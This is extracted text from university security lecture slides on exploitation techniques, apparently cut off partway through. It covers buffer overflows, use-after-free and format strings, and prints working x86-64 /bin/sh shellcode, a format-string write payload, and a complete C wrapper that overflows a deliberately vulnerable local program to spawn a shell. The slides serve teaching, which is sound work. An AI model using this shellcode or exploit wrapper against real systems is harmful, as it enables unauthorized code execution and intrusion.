CS-527 Software Security Exploitation Asst. Prof. Mathias Payer Department of Computer Science Purdue University TA: Kyriakos Ispoglou https://nebelwelt.net/teaching/17-527-SoftSec/ Spring 2017
Exploitation: Context/Disclaimer In this module we focus on exploiting actual software. We will discuss both basic and advanced exploitation techniques. For this module we assume that the given software has (i) a security-relevant vulnerability and (ii) that we know this vulnerability. You may use this knowledge to test programs locally on your own machine. It is illegal to exploit software vulnerabilities on remote machines without prior permission form the owner. Mathias Payer (Purdue University) CS-527 Software Security 2017 2 / 37
Attack Vectors Table of Contents Attack Vectors 1 Code Injection: Stack 2 Code Injection: Heap 3 Code Reuse: Format string 4 Data-Only Attack 5 Summary and conclusion 6 Mathias Payer (Purdue University) CS-527 Software Security 2017 3 / 37
Attack Vectors Buffer Overflow 1 void vuln ( char ∗ buf ) { char bounded [LEN] , ∗ ptr = bounded ; 2 while ( ∗ buf != 0) 3 ∗ ( ptr++) = ∗ buf++; 4 5 } Very powerful attack. Attacker overwrites stack frame with arbitrary data. Common targets: local variables, return instruction pointer, frame pointer. Allows to inject code and overwrite function pointer in one step. On the heap, the attack either targets heap data structures or adjacent objects. Mathias Payer (Purdue University) CS-527 Software Security 2017 4 / 37
Attack Vectors Use After Free 1 char vuln ( char ∗ buf ) { char ∗ bounded = ( char ∗ ) malloc (LEN) , ∗ ptr = bounded ; 2 while ( ∗ buf != 0) 3 ∗ ( ptr++) = ∗ buf++; 4 f r e e ( bounded ) 5 // u s u a l l y something in between . . . 6 r e t u r n ( bounded [LEN/2] == 0) ? 1 : 0; 7 8 } Powerful attack. After a memory area has been repurposed, a stale pointer is used to either read or write from that memory object. Often used to corrupt vtable pointers (e.g., when a memory area was first an object, then a char array). Mathias Payer (Purdue University) CS-527 Software Security 2017 5 / 37
Attack Vectors Format string 1 char vuln ( char ∗ buf ) { p r i n t f ( buf ) ; 2 3 } Often underestimated. Arbitrary memory writes by controlling written bytes "AAAA%1$49387c%6$hn%1$63947c%5$hn" Encode address, print, store written bytes (halfword), repeat. printf("100% not vulnerable. Or is it? \ n"); Mathias Payer (Purdue University) CS-527 Software Security 2017 6 / 37
Attack Vectors Format string An attacker controlled format string results in random writes. Constraint: target address must be somewhere on the stack (if attacker-controlled format string is on the stack then addresses – without “ \ 0” can be encoded in the string itself). Format string may consume arbitrary parameters on the stack, violates stack integrity as any parameter can be read. Mathias Payer (Purdue University) CS-527 Software Security 2017 7 / 37
Attack Vectors Direct overwrite 1 char vuln ( char ∗ buf , i n t index ) { buf [ index ] = 15; 2 3 } Arbitrary memory write. Used to set up larger attacks (if repeatable callable). High flexibility but both location of the source and target buffer must be known. Mathias Payer (Purdue University) CS-527 Software Security 2017 8 / 37
Code Injection: Stack Table of Contents Attack Vectors 1 Code Injection: Stack 2 Code Injection: Heap 3 Code Reuse: Format string 4 Data-Only Attack 5 Summary and conclusion 6 Mathias Payer (Purdue University) CS-527 Software Security 2017 9 / 37
Code Injection: Stack Code Injection First, inject shellcode somewhere into the process (e.g., a stack buffer, environment variable, argument, or heap buffer). (Ensure that buffer location is executable and known.) Redirect control-flow to the buffer. Mathias Payer (Purdue University) CS-527 Software Security 2017 10 / 37
Code Injection: Stack Shellcode: from C to assembly to machine code 1 i n t s h e l l () { asm( ” \ 2 3 needle : jmp gofar \ n \ 4 goback : pop %r d i \ n \ xor %rax , %rax \ n \ 5 movb $0x3b , %a l \ n \ 6 xor %r s i , %r s i \ n \ 7 xor %rdx , %rdx \ n \ 8 s y s c a l l \ n \ 9 10 gofar : c a l l goback \ n \ 11 . s t r i n g \ ”/ bin / sh \ ” \ n \ 12 ” ) ; 13 } 14 15 i n t main () { s h e l l () ; 16 17 } Mathias Payer (Purdue University) CS-527 Software Security 2017 11 / 37
Code Injection: Stack Shellcode 1 00000000004004 f1 < needle > : 4004 f1 : eb 0e jmp 400501 < gofar > 2 3 4 00000000004004 f3 < goback > : 4004 f3 : 5 f pop %r d i 5 4004 f4 : 48 31 c0 xor %rax ,% rax 6 4004 f7 : b0 3b mov $0x3b ,% a l 7 4004 f9 : 48 31 f6 xor %r s i ,% r s i 8 4004 f c : 48 31 d2 xor %rdx ,% rdx 9 4004 f f : 0 f 05 s y s c a l l 10 11 12 0000000000400501 < gofar > : 400501: e8 ed f f f f f f c a l l q 4004 f3 < goback > 13 400506: 2 f ( bad ) 14 400507: 62 ( bad ) 15 400508: 69 6e 2 f 73 68 00 5d imul $0x5d006873 ,0 x2f 16 (% r s i ) ,%ebp Mathias Payer (Purdue University) CS-527 Software Security 2017 12 / 37
Code Injection: Stack Code Injection: Stack 1 i n t main ( i n t argc , char ∗ argv [ ] ) { char cookie [ 3 2 ] ; 2 p r i n t f ( ” Give me a cookie (%p , %p) \ n” , cookie , getenv ( ” 3 EGG” ) ) ; s t r c p y ( cookie , argv [ 1 ] ) ; 4 p r i n t f ( ”Thanks f o r the %s \ n” , cookie ) ; 5 r e t u r n 0; 6 7 } 8 9 // Compile : gcc − g − fno − stack − p r o t e c t o r − z execstack stack . c − o s i n j 10 // Run w/o ASLR : s e t a r c h ‘ arch ‘ − R ./ s i n j Mathias Payer (Purdue University) CS-527 Software Security 2017 13 / 37
Code Injection: Stack Code Injection: Stack 1 00000000004005 cd < main > : 2 4005 cd : 55 push %rbp 3 4005 ce : 48 89 e5 mov %rsp ,%rbp 4 4005 d1 : 48 83 ec 30 sub $0x30 ,% rsp 5 4005 d5 : 89 7d dc mov %edi , − 0x24(%rbp ) 6 4005 d8 : 48 89 75 d0 mov %r s i , − 0x30(%rbp ) 7 4005 dc : bf c4 06 40 00 mov $0x4006c4 ,% e d i 8 4005 e1 : e8 aa f e f f f f c a l l q 400490 < getenv@plt > 9 4005 e6 : 48 89 c2 mov %rax ,% rdx 10 4005 e9 : 48 8d 45 e0 l e a − 0x20(%rbp ) ,% rax 11 4005 ed : 48 89 c6 mov %rax ,% r s i 12 4005 f0 : bf c8 06 40 00 mov $0x4006c8 ,% e d i 13 4005 f5 : b8 00 00 00 00 mov $0x0 ,%eax 14 4005 fa : e8 b1 f e f f f f c a l l q 4004 b0 < p r i n t f @ p l t > 15 4005 f f : 48 8b 45 d0 mov − 0x30(%rbp ) ,% rax 16 400603: 48 83 c0 08 add $0x8 ,% rax 17 400607: 48 8b 10 mov (%rax ) ,% rdx 18 40060 a : 48 8d 45 e0 l e a − 0x20(%rbp ) ,% rax 19 40060 e : 48 89 d6 mov %rdx ,% r s i 20 400611: 48 89 c7 mov %rax ,% r d i 21 400614: e8 87 f e f f f f c a l l q 4004 a0 < s t r c p y @ p l t > 22 400619: 48 8d 45 e0 l e a − 0x20(%rbp ) ,% rax 23 40061d : 48 89 c6 mov %rax ,% r s i 24 400620: bf e3 06 40 00 mov $0x4006e3 ,% e d i 25 400625: b8 00 00 00 00 mov $0x0 ,%eax 26 40062 a : e8 81 f e f f f f c a l l q 4004 b0 < p r i n t f @ p l t > 27 40062 f : b8 00 00 00 00 mov $0x0 ,%eax 28 400634: c9 l e a v e q 29 400635: c3 r e t q Mathias Payer (Purdue University) CS-527 Software Security 2017 14 / 37
Code Injection: Stack Wrapper 1 #d e f i n e BUFSIZE 0x20 2 #d e f i n e EGGLOC 0 x 7 f f f f f f f e f c 8 3 i n t main ( i n t argc , char ∗ argv [ ] ) { 4 char s h e l l c o d e [ ] = ”EGG=” 5 ” \ xeb \ x0e ” // jump +0xe (+14) 6 ” \ x5f ” // push %r d i 7 ” \ x48 \ x31 \ xc0 ” // xor %rax , %rax 8 ” \ xb0 \ x3b” // mov $0x3b , %a l 9 ” \ x48 \ x31 \ xf6 ” // xor %r s i , %r s i 10 ” \ x48 \ x31 \ xd2” // xor %rdx , %rdx 11 ” \ x0f \ x05” // s y s c a l l 12 ” \ xe8 \ xed \ x f f \ x f f \ x f f \ x2f ” // c a l l 0 xed ( − 19) 13 ” \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x00 \ x5d” ; // / bin / bash+ \ 0 14 15 // f i l l b u f f e r + ebp with 0x41 ’ s 16 char buf [ 2 5 6 ] ; 17 f o r ( i n t i = 0; i < BUFSIZE+s i z e o f ( void ∗ ) ; buf [ i ++] = ’A ’ ) ; 18 19 // o v e r w r i t e RIP with eggloc 20 char ∗∗ b u f f = ( char ∗∗ )(&buf [ BUFSIZE+s i z e o f ( void ∗ ) ] ) ; 21 ∗ ( b u f f++) = ( void ∗ )EGGLOC; 22 ∗ b u f f = ( void ∗ )0x0 ; 23 24 // setup e x e c u t i o n environment and f i r e e x p l o i t 25 char ∗ args [ 3 ] = { ” ./ s i n j ” , buf , NULL } ; 26 char ∗ envp [ 2 ] = { s h e l l c o d e , NULL } ; 27 execve ( ” . / s i n j ” , args , envp ) ; 28 r e t u r n 0; 29 } Mathias Payer (Purdue University) CS-527 Software Security 2017 15 / 37
Code Injection: Stack Stack code injection gannimo@localhost:~/repos/teach/CS527/examples{0}$ \ setarch x86_64 -R ./stack-ci-wrapper Give me a cookie (0x7fffffffed10, 0x7fffffffefd3) Thanks for the AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA $ whoami gannimo $ exit Mathias Payer (Purdue University) CS-527 Software Security 2017 16 / 37
Code Injection: Heap Table of Contents Attack Vectors 1 Code Injection: Stack 2 Code Injection: Heap 3 Code Reuse: Format string 4 Data-Only Attack 5 Summary and conclusion 6 Mathias Payer (Purdue University) CS-527 Software Security 2017 17 / 37
Recommend
More recommend